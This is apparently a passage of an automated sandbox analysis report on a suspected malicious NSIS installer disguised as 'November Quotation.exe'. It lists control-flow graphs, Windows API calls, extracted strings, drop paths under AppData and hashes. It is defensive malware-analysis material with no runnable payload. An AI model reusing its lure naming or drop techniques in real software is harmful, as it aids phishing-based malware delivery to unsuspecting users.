388->391 389->385 394 405f8a-405f90 lstrcatW 389->394 390->386 396 405f45-405f5b SHGetSpecialFolderLocation 391->396 397 405f2d-405f30 391->397 394->385 398 405f76 396->398 399 405f5d-405f74 SHGetPathFromIDListW CoTaskMemFree 396->399 397->396 401 405f32-405f39 397->401 398->388 399->386 399->398 402 405f41-405f43 401->402 402->386 402->396
                                                                                                              APIs
                                                                                                              • GetVersion.KERNEL32(00000000,Completed,?,00405082,Completed,00000000,00000000,0041AB9A), ref: 00405E86
                                                                                                              • GetSystemDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F04
                                                                                                              • GetWindowsDirectoryW.KERNEL32(: Completed,00000400), ref: 00405F17
                                                                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405F53
                                                                                                              • SHGetPathFromIDListW.SHELL32(?,: Completed), ref: 00405F61
                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00405F6C
                                                                                                              • lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F90
                                                                                                              • lstrlenW.KERNEL32(: Completed,00000000,Completed,?,00405082,Completed,00000000,00000000,0041AB9A), ref: 00405FEA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                              • String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$|ru
                                                                                                              • API String ID: 900638850-2317216194
                                                                                                              • Opcode ID: a4241290310f47902df7e14e092ed996a1af57ff1f713b0137af2fcea51179bc
                                                                                                              • Instruction ID: 51fea1f0525bd32aa09071eea97aa62567f0d70ed35b44e0f17875bb3ea282eb
                                                                                                              • Opcode Fuzzy Hash: a4241290310f47902df7e14e092ed996a1af57ff1f713b0137af2fcea51179bc
                                                                                                              • Instruction Fuzzy Hash: 7561EE71A00A06ABDB209F64CC45AAF37A5EF54314F11C13BE941BA2E0D77D9A82CF4D
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 310444273-0
                                                                                                              • Opcode ID: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                                              • Instruction ID: fdb84e6153f048f4f32cb56b497edeca1f79cb2b45eddc07a3c36f847a24315a
                                                                                                              • Opcode Fuzzy Hash: 5679b5def2f7da251302a8cf4847d9d0b7faea0d144796f5e929e2ea3512b209
                                                                                                              • Instruction Fuzzy Hash: D9E0CD326002309FC3105B34AE4497773AC9FA8740305043DF586F6000CB749C22EF69
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNELBASE(?,00430248,0042FA00,0040593D,0042FA00,0042FA00,00000000,0042FA00,0042FA00,?,?,76F93420,00405649,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004060EF
                                                                                                              • FindClose.KERNEL32(00000000), ref: 004060FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                              • String ID:
                                                                                                              • API String ID: 2295610775-0
                                                                                                              • Opcode ID: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                                              • Instruction ID: 5d70c47cb11938251a0a1db446d6214bf1d94b5ec034c03d4844f4bffd5ee079
                                                                                                              • Opcode Fuzzy Hash: 9c2bed4397a3bf892ba140cd3fe5090782190f2fd0e109c23d43d293603923f5
                                                                                                              • Instruction Fuzzy Hash: 1DD012755540309BD7805738AE0C84B7A59AF193317224B36F46AF62E0D7788C66869C

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 167 403b0e-403b20 168 403c61-403c70 167->168 169 403b26-403b2c 167->169 171 403c72-403cba GetDlgItem * 2 call 403fe6 SetClassLongW call 40140b 168->171 172 403cbf-403cd4 168->172 169->168 170 403b32-403b3b 169->170 173 403b50-403b53 170->173 174 403b3d-403b4a SetWindowPos 170->174 171->172 176 403d14-403d19 call 404032 172->176 177 403cd6-403cd9 172->177 179 403b55-403b67 ShowWindow 173->179 180 403b6d-403b73 173->180 174->173 186 403d1e-403d39 176->186 182 403cdb-403ce6 call 401389 177->182 183 403d0c-403d0e 177->183 179->180 187 403b75-403b8a DestroyWindow 180->187 188 403b8f-403b92 180->188 182->183 198 403ce8-403d07 SendMessageW 182->198 183->176 185 403fb3 183->185 193 403fb5-403fbc 185->193 191 403d42-403d48 186->191 192 403d3b-403d3d call 40140b 186->192 194 403f90-403f96 187->194 196 403b94-403ba0 SetWindowLongW 188->196 197 403ba5-403bab 188->197 201 403f71-403f8a DestroyWindow EndDialog 191->201 202 403d4e-403d59 191->202 192->191 194->185 199 403f98-403f9e 194->199 196->193 203 403bb1-403bc2 GetDlgItem 197->203 204 403c4e-403c5c call 40404d 197->204 198->193 199->185 208 403fa0-403fa9 ShowWindow 199->208 201->194 202->201 209 403d5f-403dac call 405dc3 call 403fe6 * 3 GetDlgItem 202->209 205 403be1-403be4 203->205 206 403bc4-403bdb SendMessageW IsWindowEnabled 203->206 204->193 210 403be6-403be7 205->210 211 403be9-403bec 205->211 206->185 206->205 208->185 237 403db6-403df2 ShowWindow KiUserCallbackDispatcher call 404008 EnableWindow 209->237 238 403dae-403db3 209->238 214 403c17-403c1c call 403fbf 210->214 215 403bfa-403bff 211->215 216 403bee-403bf4 211->216 214->204 218 403c35-403c48 SendMessageW 215->218 220 403c01-403c07 215->220 216->218 219 403bf6-403bf8 216->219 218->204 219->214 223 403c09-403c0f call 40140b 220->223 224 403c1e-403c27 call 40140b 220->224 235 403c15 223->235 224->204 233 403c29-403c33 224->233 233->235 235->214 241 403df4-403df5 237->241 242 403df7 237->242 238->237 243 403df9-403e27 GetSystemMenu EnableMenuItem SendMessageW 241->243 242->243 244 403e29-403e3a SendMessageW 243->244 245 403e3c 243->245 246 403e42-403e80 call 40401b call 405da1 lstrlenW call 405dc3 SetWindowTextW call 401389 244->246 245->246 246->186 255 403e86-403e88 246->255 255->186 256 403e8e-403e92 255->256 257 403eb1-403ec5 DestroyWindow 256->257 258 403e94-403e9a 256->258 257->194 260 403ecb-403ef8 CreateDialogParamW 257->260 258->185 259 403ea0-403ea6 258->259 259->186 261 403eac 259->261 260->194 262 403efe-403f55 call 403fe6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 260->262 261->185 262->185 267 403f57-403f6a ShowWindow call 404032 262->267 269 403f6f 267->269 269->194
                                                                                                              APIs
                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B4A
                                                                                                              • ShowWindow.USER32(?), ref: 00403B67
                                                                                                              • DestroyWindow.USER32 ref: 00403B7B
                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403B97
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403BB8
                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403BCC
                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403BD3
                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403C81
                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403C8B
                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403CA5
                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403CF6
                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403D9C
                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403DBD
                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DCF
                                                                                                              • EnableWindow.USER32(?,?), ref: 00403DEA
                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E00
                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403E07
                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403E1F
                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403E32
                                                                                                              • lstrlenW.KERNEL32(0042D1F8,?,0042D1F8,inelegancy), ref: 00403E5B
                                                                                                              • SetWindowTextW.USER32(?,0042D1F8), ref: 00403E6F
                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403FA3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                              • String ID: $;u$inelegancy
                                                                                                              • API String ID: 3282139019-3620772351
                                                                                                              • Opcode ID: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                                                              • Instruction ID: 60ca7c1d91bee6f8242d2bed331db898ad50b25bc51b1c46c45c1ad212b6c09a
                                                                                                              • Opcode Fuzzy Hash: faeace5642cdda3558d84447fe0703c4348c0d149e23cdb61c619dc2470e19a1
                                                                                                              • Instruction Fuzzy Hash: B6C1DD71904205ABDB216F61EE86E2A3E7CFB4570AF14053EF641B11E0CB799A42DB2D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 270 40376b-403783 call 40610b 273 403785-403795 call 405ce8 270->273 274 403797-4037ce call 405c6e 270->274 281 4037f1-40381a call 403a41 call 4058f4 273->281 279 4037d0-4037e1 call 405c6e 274->279 280 4037e6-4037ec lstrcatW 274->280 279->280 280->281 288 403820-403825 281->288 289 4038ac-4038b4 call 4058f4 281->289 288->289 290 40382b-403845 call 405c6e 288->290 295 4038c2-4038e7 LoadImageW 289->295 296 4038b6-4038bd call 405dc3 289->296 294 40384a-403853 290->294 294->289 297 403855-403859 294->297 299 403968-403970 call 40140b 295->299 300 4038e9-403919 RegisterClassW 295->300 296->295 302 40386b-403877 lstrlenW 297->302 303 40385b-403868 call 405819 297->303 312 403972-403975 299->312 313 40397a-403985 call 403a41 299->313 304 403a37 300->304 305 40391f-403963 SystemParametersInfoW CreateWindowExW 300->305 309 403879-403887 lstrcmpiW 302->309 310 40389f-4038a7 call 4057ec call 405da1 302->310 303->302 307 403a39-403a40 304->307 305->299 309->310 311 403889-403893 GetFileAttributesW 309->311 310->289 316 403895-403897 311->316 317 403899-40389a call 405838 311->317 312->307 323 40398b-4039a8 ShowWindow LoadLibraryW 313->323 324 403a0e-403a0f call 40511e 313->324 316->310 316->317 317->310 326 4039b1-4039c3 GetClassInfoW 323->326 327 4039aa-4039af LoadLibraryW 323->327 328 403a14-403a16 324->328 329 4039c5-4039d5 GetClassInfoW RegisterClassW 326->329 330 4039db-4039fe DialogBoxParamW call 40140b 326->330 327->326 331 403a30-403a32 call 40140b 328->331 332 403a18-403a1e 328->332 329->330 336 403a03-403a0c call 4036bb 330->336 331->304 332->312 334 403a24-403a2b call 40140b 332->334 334->312 336->307
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040610B: GetModuleHandleA.KERNEL32(?,?,00000020,0040326C,00000008), ref: 0040611D
                                                                                                                • Part of subcall function 0040610B: LoadLibraryA.KERNELBASE(?,?,00000020,0040326C,00000008), ref: 00406128
                                                                                                                • Part of subcall function 0040610B: GetProcAddress.KERNEL32(00000000,?), ref: 00406139
                                                                                                              • lstrcatW.KERNEL32(1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76F93420,00000000,"C:\Users\user\Desktop\November Quotation.exe"), ref: 004037EC
                                                                                                              • lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\sognenes\iconograph,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 0040386C
                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\sognenes\iconograph,1033,0042D1F8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D1F8,00000000), ref: 0040387F
                                                                                                              • GetFileAttributesW.KERNEL32(: Completed), ref: 0040388A
                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\sognenes\iconograph), ref: 004038D3
                                                                                                                • Part of subcall function 00405CE8: wsprintfW.USER32 ref: 00405CF5
                                                                                                              • RegisterClassW.USER32(00433E40), ref: 00403910
                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403928
                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040395D
                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403993
                                                                                                              • LoadLibraryW.KERNELBASE(RichEd20), ref: 004039A4
                                                                                                              • LoadLibraryW.KERNEL32(RichEd32), ref: 004039AF
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00433E40), ref: 004039BF
                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00433E40), ref: 004039CC
                                                                                                              • RegisterClassW.USER32(00433E40), ref: 004039D5
                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403B0E,00000000), ref: 004039F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                              • String ID: "C:\Users\user\Desktop\November Quotation.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$@>C$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sognenes\iconograph$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                              • API String ID: 914957316-917887613
                                                                                                              • Opcode ID: 5d79a90b9734de2f400a9a690d67233a17bb638de7ed7b1062436894d318c2b7
                                                                                                              • Instruction ID: 9058ea0fac2f7b5828f11579708a501ddeab19906f501c4d7d338e07c4ff49df
                                                                                                              • Opcode Fuzzy Hash: 5d79a90b9734de2f400a9a690d67233a17bb638de7ed7b1062436894d318c2b7
                                                                                                              • Instruction Fuzzy Hash: 2761B871600700AFD720BF669D46F2B3A6CEB84B4AF50443FF940B62E1CBB95941CA2D

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 403 402d67-402db5 GetTickCount GetModuleFileNameW call 405a0d 406 402dc1-402def call 405da1 call 405838 call 405da1 GetFileSize 403->406 407 402db7-402dbc 403->407 415 402df5 406->415 416 402edc-402eea call 402d03 406->416 408 402f99-402f9d 407->408 418 402dfa-402e11 415->418 422 402eec-402eef 416->422 423 402f3f-402f44 416->423 420 402e13 418->420 421 402e15-402e1e call 4031c8 418->421 420->421 430 402e24-402e2b 421->430 431 402f46-402f4e call 402d03 421->431 425 402ef1-402f09 call 4031de call 4031c8 422->425 426 402f13-402f3d GlobalAlloc call 4031de call 402fa0 422->426 423->408 425->423 453 402f0b-402f11 425->453 426->423 452 402f50-402f61 426->452 435 402ea7-402eab 430->435 436 402e2d-402e41 call 4059c8 430->436 431->423 441 402eb5-402ebb 435->441 442 402ead-402eb4 call 402d03 435->442 436->441 450 402e43-402e4a 436->450 443 402eca-402ed4 441->443 444 402ebd-402ec7 call 4061b9 441->444 442->441 443->418 451 402eda 443->451 444->443 450->441 456 402e4c-402e53 450->456 451->416 457 402f63 452->457 458 402f69-402f6e 452->458 453->423 453->426 456->441 459 402e55-402e5c 456->459 457->458 460 402f6f-402f75 458->460 459->441 461 402e5e-402e65 459->461 460->460 462 402f77-402f92 SetFilePointer call 4059c8 460->462 461->441 463 402e67-402e87 461->463 466 402f97 462->466 463->423 465 402e8d-402e91 463->465 467 402e93-402e97 465->467 468 402e99-402ea1 465->468 466->408 467->451 467->468 468->441 469 402ea3-402ea5 468->469 469->441
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00402D78
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400,?,?,?,00000000,0040344F,?), ref: 00402D94
                                                                                                                • Part of subcall function 00405A0D: GetFileAttributesW.KERNELBASE(00000003,00402DA7,00442800,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00405A11
                                                                                                                • Part of subcall function 00405A0D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,0040344F,?), ref: 00405A33
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00442800,00442800,80000000,00000003,?,?,?,00000000,0040344F,?), ref: 00402DE0
                                                                                                              Strings
                                                                                                              • soft, xrefs: 00402E55
                                                                                                              • Null, xrefs: 00402E5E
                                                                                                              • C:\Users\user\Desktop, xrefs: 00402DC2, 00402DC7, 00402DCD
                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402F3F
                                                                                                              • Error launching installer, xrefs: 00402DB7
                                                                                                              • Inst, xrefs: 00402E4C
                                                                                                              • "C:\Users\user\Desktop\November Quotation.exe", xrefs: 00402D6D
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D71
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1352441730.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1352422981.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352461057.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352481691.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1352663469.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_November Quotation.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                              • String ID: "C:\Users\user\Desktop\November Quotation.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                              • API String ID: 4283519449-3863715819
                                                                                                              • Opcode ID: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                                                              • Instruction ID: 2344981239cccc2d9a157a4bc97fadfb01f0662fe41213100d9ed930206fcb3f
                                                                                                              • Opcode Fuzzy Hash: 2e3c47bfa60127b1afce542dec9d1826138b9062359befd6d0ef1f45db9145ec
                                                                                                              • Instruction Fuzzy Hash: 2451D171900215AFDB109FA5DE89B9F7AB8FB04359F20413BF904B62D1C7B89D408BAD

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 470 401752-401777 call 402b38 call 405863 475 401781-401793 call 405da1 call 4057ec lstrcatW 470->475 476 401779-40177f call 405da1 470->476 481 401798-401799 call 406035 475->481 476->481 485 40179e-4017a2 481->485 486 4017a4-4017ae call 4060e4 485->486 487 4017d5-4017d8 485->487 494 4017c0-4017d2 486->494 495 4017b0-4017be CompareFileTime 486->495 488 4017e0-4017fc call 405a0d 487->488 489 4017da-4017db call 4059e8 487->489 497 401870-401899 call 40504b call 402fa0 488->497 498 4017fe-401801 488->498 489->488 494->487 495->494 510 4018a1-4018ad SetFileTime 497->510 511 40189b-40189f 497->511 499 401852-40185c call 40504b 498->499 500 401803-401841 call 405da1 * 2 call 405dc3 call 405da1 call 40557d 498->500 512 401865-40186b 499->512 500->485 532 401847-401848 500->532 514 4018b3-4018be CloseHandle 510->514 511->510 511->514 515 4029ce 512->515 518 4018c4-4018c7 514->518 519 4029c5-4029c8 514->519 517 4029d0-4029d4 515->517 522 4018c9-4018da call 405dc3 lstrcatW 518->522 523 4018dc-4018df call 405dc3 518->523 519->515 529 4018e4-402241 call 40557d 522->529 523->529 529->517 529->519 532->512 534 40184a-40184b 532->534 534->499
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,%flechettes%\slaggerne\grudgingness,C:\Users\user\AppData\Local\sognenes\iconograph\Folkways,?,?,00000031), ref: 00401793
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,%flechettes%\slaggerne\grudgingness,%flechettes%\slaggerne\grudgingness,00000000,00000000,%flechettes%\slaggerne\grudgingness,C:\Users\user\AppData\Local\sognenes\iconograph\Folkways,?,?,00000031), ref: 004017B8
                                                                                                                • Part of subcall function 00405DA1: lstrcpynW.KERNEL32(?,?,00000400,00403297,inelegancy,NSIS Error), ref: 00405DAE
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000,?), ref: 00405083
                                                                                                                • Part of subcall function 0040504B: lstrlenW.KERNEL32(00403103,Completed,00000000,0041AB9A,76F923A0,?,?,?,?,?,?,?,?,?,00403103,00000000), ref: 00405093
                                                                                                                • Part of subcall function 0040504B: lstrcatW.KERNEL32(Completed,00403103,00403103,Completed,00000000,0041AB9A,76F923A0), ref: 004050A6
                                                                                                                • Part of subcall function 0040504B: SetWindowTextW.USER32(Completed,Completed), ref: 004050B8
                                                                                                                • Part of subcall function 0040504B: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004050DE
